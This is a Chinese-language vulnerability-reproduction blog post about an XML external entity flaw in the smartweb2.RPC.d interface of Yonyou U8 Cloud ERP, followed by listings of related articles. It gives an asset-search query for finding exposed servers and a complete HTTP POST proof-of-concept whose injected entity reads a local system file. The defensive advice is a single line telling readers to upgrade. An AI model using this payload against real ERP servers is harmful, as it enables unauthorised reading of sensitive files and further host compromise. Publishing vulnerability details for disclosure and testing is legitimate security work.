用友U8 Cloud smartweb2.RPC.d XML外部实体注入漏洞

已于 2024-01-05 10:10:35 修改
阅读量1.4k 收藏 7
点赞数 7
分类专栏: 漏洞复现 文章标签: rpc xml 网络协议 安全 web安全
于 2024-01-05 10:05:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36618918/article/details/135402449
版权

产品介绍

用友U8cloud是用友推出的新一代云ERP,主要聚焦成长型、创新型、集团型企业,提供企业级云ERP整体解决方案。它包含ERP的各项应用,包括iUAP、财务会计、iUFO cloud、供应链与质量管理、人力资源、生产制造、管理会计、资产管理,以及电商通、U会员、U订货、友云采、友报账、友空间、友人才等用友云服务。

漏洞描述

用友U8 Cloud smartweb2.RPC.d接口存在XML外部实体注入漏洞,由于用友GRP-U8未对用户的输入进行有效的过滤,攻击者可通过xml实体注入漏洞获取敏感信息,进一步利用可造成主机失陷。

资产测绘

app=“用友-U8-Cloud”
在这里插入图片描述

漏洞复现

POC如下:

POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Length: 258
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Language: zh-CN,zh;q=0.9
Connection: close

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

在这里插入图片描述

修复建议

联系厂商升级至最新安全版本。

keepb1ue
关注
专栏目录
用友U8 Cloud smartweb2.RPC.d XXE漏洞复现
0xSec
01-05 1063
用友U8 Cloud smartweb2.RPC.d接口处存在XXE漏洞,攻击者可通过该漏洞获取敏感文件信息,攻击者添加恶意内容,通过易受攻击的代码,就能够攻击包含缺陷的XML处理器。
用友U8 Cloud smartweb2.showRPCLoadingTip.d XXE漏洞复现
0xSec
06-26 781
用友U8 Cloud smartweb2.showRPCLoadingTip.d 接口处存在XML实体,攻击者可通过该漏洞获取敏感文件信息,攻击者添加恶意内容,通过易受攻击的代码,就能够攻击包含缺陷的XML处理器。
用友GRP-U8 ufgovbank.class XXE漏洞
Keepb1ue的博客
01-08 615
用友GRP-U8R10内控管理软性软性是用友公司专注于电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域专业的财务管理软件。
未公开 用友-U8C-Cloud approveservlet sql注入
weixin_43167326的博客
08-27 1250
用友U8 Cloud是由用友公司开发和提供的一款云端企业管理软件。它是基于云计算和大数据技术的全面企业管理解决方案,旨在帮助企业实现数字化转型和业务优化。该产品多个接口存在SQL注入漏洞
浪潮GS企业管理软件 多处 .NET反序列化RCE漏洞
weixin_43167326的博客
07-30 959
浪潮GS企业管理软件产品是一款面向大中型集团企业的全面解决方案,它基于Microsoft.NET技术路线和SOA(面向服务的架构),采用SOA架构和先进开放的GSP应用中间件开发,支持Web服务和Xml进行远程通信及数据交换。旨在帮助大中型集团企业实现资源整合、流程优化和智能决策,提升管理水平和竞争力。
用友U8 Cloud smartweb2.RPC.d SQL注入漏洞
Keepb1ue的博客
01-05 2946
用友U8cloud是用友推出的新一代云ERP,主要聚焦成长型、创新型、集团型企业,提供企业级云ERP整体解决方案。它包含ERP的各项应用,包括iUAP、财务会计、iUFO cloud、供应链与质量管理、人力资源、生产制造、管理会计、资产管理,以及电商通、U会员、U订货、友云采、友报账、友空间、友人才等用友云服务。
用友U8V11.0清除工具.rar
04-15
用友U8V11.0清除工具】是一款专门针对用友U8V11.0财务软件的清理工具,旨在解决用户在使用过程中可能遇到的系统问题、数据冗余以及性能优化等问题。该工具的出现,为管理信息系统领域的专业人士提供了一种便捷的...
用友U8 Cloud soapFormat XXE漏洞复现
0xSec
12-27 859
用友U8 Cloud soapFormat.ajax接口处存在 XXE漏洞,攻击者可通过该漏洞获取敏感文件信息,攻击者添加恶意内容,通过易受攻击的代码,就能够攻击包含缺陷的XML处理器。
用友U8 cloud V1.0-外部交换平台技术红皮书.pdf
02-16
### 用友U8 cloud V1.0-外部交换平台技术红皮书 #### 总体概述 **用友U8 cloud V1.0-外部交换平台技术红皮书**是一份详细介绍用友U8 cloud V1.0版本中信息交换平台的技术文档。该平台作为新一代云ERP解决方案的...
DIVA靶场测试APP客户端不规范项(一)_diva android 是什么应用
wdsfgj的博客
04-17 847
使用了SharedPreferences类,该类是Android平台上一个轻量级的存储类,主要是用来保存一些常用的配置,本例中是用该类存储了用户名和密码,因此是具有风险的。SharedPreferences类存储的数据会以.xml的形式存储在/data/data/apppackagename/shared_prefs目录下。一般app对应的数据库目录: /data/data/apppackagename/databases。使用adb查看临时文件,目录在/data/data/apppackagename/
XML 外部实体注入
2201_75370376的博客
06-22 1054
SQL注入是一种web安全漏洞,使攻击者干扰应用程序对其数据库的查询。它通常使攻击者可以查看他们无法检索的数据。这可能包括属于其他用户的数据,或应用程序本身能够访问的任何其他数据。在许多情况下,攻击者可以修改或删除这些数据,从而导致应用程序的数据发生不正常更改。在某些情况下,攻击者可以逐步扩大SQL注入攻击,以危害底层服务器或其他后端基础设施。
漏洞复现】用友U8 Cloud——XXE
LongL_GuYu的博客
07-13 833
用友U8 Cloud 提供企业级云ERP整体解决方案,全面支持多组织业务协同,实现企业互联网资源连接。其smartweb2.showRPCLoadingTip.d接口处存在XML实体,攻击者可通过该漏洞获取敏感文件信息。
用友 NC 24处接口XML实体注入漏洞复现
0xSec
02-28 1246
用友 NC 多处接口存在XML实体注入漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
用友移动管理系统 任意文件上传漏洞复现
0xSec
08-12 2355
用友移动管理系统 uploadApk.do 接口存在任意文件上传漏洞,未经授权攻击者通过漏洞上传任意文件,最终可以获取服务器权限。
SRC挖洞之SSRF与XXE漏洞的实战案例
道阻且长,行则将至。
05-31 2308
文章目录前言SSRF漏洞案例1 某翻译网SSRF可通内网案例2 某翻译网SSRF防护绕过案例3 某站SSRF读取本地文件案例4 某站视频解析导致SSRF案例5 某狗主站SSRF多种绕过案例6 某乎网SSRF可探测内网XXE漏洞案例1 用友某软件存在XXE漏洞案例2 XFire 开发组件XXE漏洞案例3 博客搬家功能处XXE漏洞案例4 用友某软件存在XXE盲注总结 前言 前面一篇文章 SRC挖洞之文件上传/下载漏洞的实战案例 介绍了 任意文件下载漏洞 和 任意文件上传漏洞,本文收集讲述下 SSRF 漏洞和 X
src
estick的专栏
12-12 573
var __startTime=new Date(); var __DORADO_VERSION="5.1 071028.1957 (OEM_STANDARD)";var __DEFAULT_LOADDATA_SERVICE="/dorado/smartweb2.RPC.d";var __DEFAULT_UPDATEDATA_SERVICE="/dorado/sm
RPC】—Thrift协议 & VS Protobuf
一棵灬大树的博客
10-07 1116
Thrift是一套包含序列化功能和支持服务通信的RPC框架,主要包含三大部分:代码生成、序列化框架、RPC框架,大致相当于protoc + protobuffer + grpc,并且支持大量语言,保证常用功能在跨语言间功能一致,是一套全栈式的RPC解决方案。Thrift整体架构图如下:Thrift 本身是一个比较大的话题,本文不会涉及到全部内容,重点介绍其中的序列化协议。
MyBatis XML映射文件
最新发布
Golemon的博客
10-10 585
而不是com目录下有prj_name目录,prj_name目录下有mapper目录这样类型的。配置:XML映射文件中sql语句的id与Mapper接口中的方法名一致,并保持返回类型一致。配置:XML映射文件的namespace属性为Mapper接口全限定名。安装mybatisX插件,可以在xml和对应mapper中进行跳转。在该目录下创建对应xml文件。在javaweb项目中的。中创建对应目录,输出。
用友U8 CLOUD数据集成方案详解
"用友U8 CLOUD 数据集成方案提供了外部数据交换平台,实现了外部系统与U8 CLOUD之间的数据交互。此方案支持数据导入和导出,采用XML作为统一的数据交换标准,具有面向服务的架构,允许灵活配置和自由扩充。外部系统...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值